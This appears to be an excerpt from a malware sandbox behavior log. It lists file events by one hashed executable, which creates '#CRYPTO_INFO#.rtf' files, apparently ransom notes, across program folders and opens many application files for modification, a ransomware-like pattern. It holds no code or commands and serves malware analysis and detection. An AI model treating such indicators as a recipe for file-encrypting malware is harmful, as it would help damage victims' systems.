8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\access-bridge-64.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\LINEAR_RGB.pf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-default.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sendforcomments_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_wob.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ms_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ar_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\check-mark-1x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\et_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\bin\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_patterns_header.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_unselected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\close-2.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-default_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\US_export_policy.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pt_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\id.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\cstm_brand_preview.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\nbexec.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sl.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close_h2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_en_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-de_de.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\manifest.json 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sendforsignature_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\svgCheckboxSelected.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\PYCC.pf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\browser\features\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ml.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\caution.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\java.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\el.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-BoldOblique.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\tzmappings 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#CRYPTO_INFO#.rtf 